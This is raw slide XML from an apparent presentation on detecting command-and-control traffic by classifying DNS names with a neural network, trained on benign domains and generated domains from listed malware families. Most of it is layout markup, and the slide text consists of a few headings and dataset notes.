          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Training dataset:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">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sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Equal number of benign and malicious domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Malicious domains from banjori, corebot, cryptolocker, dircrypt, kraken, lockyv2, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pykspa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, qakbot, ramdo, ramnit, simda</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EF64F05-D30A-4727-BF3B-FE70DED68AA8}"/>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6773374" y="4437268"/>
            <a:ext cx="2253286" cy="484496"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C3837E3-B120-4FB0-B18A-28DDFE20B9E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7194731" y="5388051"/>
            <a:ext cx="849402" cy="688704"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60B1142C-B467-453F-BC70-A69AD77B7BC3}"/>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8856428" y="4750158"/>
            <a:ext cx="1476249" cy="1157060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0546A02F-38FD-4992-8C8E-AF7E54302D79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571465" y="1701213"/>
            <a:ext cx="8521832" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DETECTING C&amp;C TRAFFIC USING NEURAL NETWORK TO EVALUATE DNS NAMES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25C150A7-5D9E-4AF2-A615-FE6E5CD1EC55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9">
            <a:duotone>
              <a:schemeClr val="accent2">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:srcRect l="4259" r="992"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1329113" y="2271976"/>
            <a:ext cx="4330591" cy="1489748"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9186C48-9BA3-43F1-B856-BA88B74E8B4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5730061" y="2339934"/>
            <a:ext cx="4756955" cy="1465527"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7429657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9CF664A5-5490-4425-8156-3F4009090781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="11858"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="18662" y="1468670"/>
            <a:ext cx="12192000" cy="5388052"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>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22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F90482EA-11AB-45B2-A960-F3D84341E299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239383" y="3664749"/>
            <a:ext cx="1894659" cy="371759"/>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Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86E1EB97-016E-4940-B672-B37B426F97BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="832199" y="1951438"/>
            <a:ext cx="2316173" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DETECTING C&amp;C </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PRODUCTION SETUP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Can 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C694078-E677-4BC6-941C-8724B70660AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9937456" y="4337274"/>
            <a:ext cx="403521" cy="484025"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 59975"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
          </a:gradFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="65000"/>
                <a:lumOff val="3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5" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33B8E2F5-5C01-45DB-AE6C-790583630CED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5812692" y="1871936"/>
            <a:ext cx="1205343" cy="184666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>End User</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="Straight Arrow Connector 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44D6BCC3-B9AB-4A82-956B-68C0098A4D76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6795399" y="2320507"/>
            <a:ext cx="1050587" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:headEnd type="triangle"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15052791-5276-4B2A-80A7-828C8A04C0B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
            <a:duotone>
              <a:schemeClr val="accent2">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7935897" y="2053709"/>
            <a:ext cx="463521" cy="571370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Picture 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94095699-0B6E-4F2E-A80E-0ECE9B22B833}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
            <a:grayscl/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6020699" y="1925309"/>
            <a:ext cx="736600" cy="736600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9C33B6C-1836-4692-B4A0-26B14D7C36D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
            <a:duotone>
              <a:schemeClr val="accent2">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6169938" y="3177724"/>
            <a:ext cx="463521" cy="571370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30" name="Straight Arrow Connector 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DFACEC8-3404-4383-B05F-1AED37E7AD95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6388998" y="2664067"/>
            <a:ext cx="0" cy="46968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31" name="Straight Arrow Connector 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04E8AD3B-8BA7-4D94-A572-1D4F68410A77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9467802" y="2446971"/>
            <a:ext cx="0" cy="720243"/>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32" name="Straight Arrow Connector 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3946AA8F-5E03-4251-B8D4-2649AB496B56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8447862" y="2320507"/>
            <a:ext cx="534695" cy="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pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Picture 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C42C97B4-FFEE-4358-BBFA-082C04C831E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
            <a:duotone>
              <a:schemeClr val="accent2">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9272557" y="3208416"/>
            <a:ext cx="463521" cy="571370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="35" name="Straight Arrow Connector 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{831C22B1-9651-48FA-A93A-01BCFC372B80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9467802" y="3821844"/>
            <a:ext cx="0" cy="315652"/>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36" name="Straight Arrow Connector 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3918AF16-D78C-4529-B127-42B6BCB1491D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9457848" y="4137496"/>
            <a:ext cx="534695" cy="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37" name="Straight Arrow Connector 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E138DA1-7301-4162-BB1D-8F1CB028182F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8959252" y="4137554"/>
            <a:ext cx="514090" cy="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pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Picture 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD81B104-9334-4CC9-A5AB-C3C144E5F539}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
            <a:duotone>
              <a:schemeClr val="accent2">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8757728" y="4252308"/>
            <a:ext cx="463521" cy="571370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Picture 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A410FE3C-E745-404B-AADF-F73F7169CE15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
            <a:duotone>
              <a:schemeClr val="accent2">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9185531" y="5327435"/>
            <a:ext cx="463521" cy="571370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="40" name="Straight Arrow Connector 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{011A5BED-7617-4512-890A-8342CA7C59C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9251889" y="4832144"/>
            <a:ext cx="0" cy="532375"/>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41" name="Straight Arrow Connector 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD124E81-A69C-48F4-A826-9A4E34924B63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8689090" y="5898805"/>
            <a:ext cx="514090" cy="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pic>
        <p:nvPicPr>
          <p:cNvPr id="42" name="Picture 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0019EE35-C1FA-4641-A92F-6BEA39056120}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
            <a:duotone>
              <a:schemeClr val="accent2">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8391923" y="5327435"/>
            <a:ext cx="463521" cy="571370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="43" name="Straight Arrow Connector 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89C0F3AE-68EE-4274-ACB5-BF1EED9B6C37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
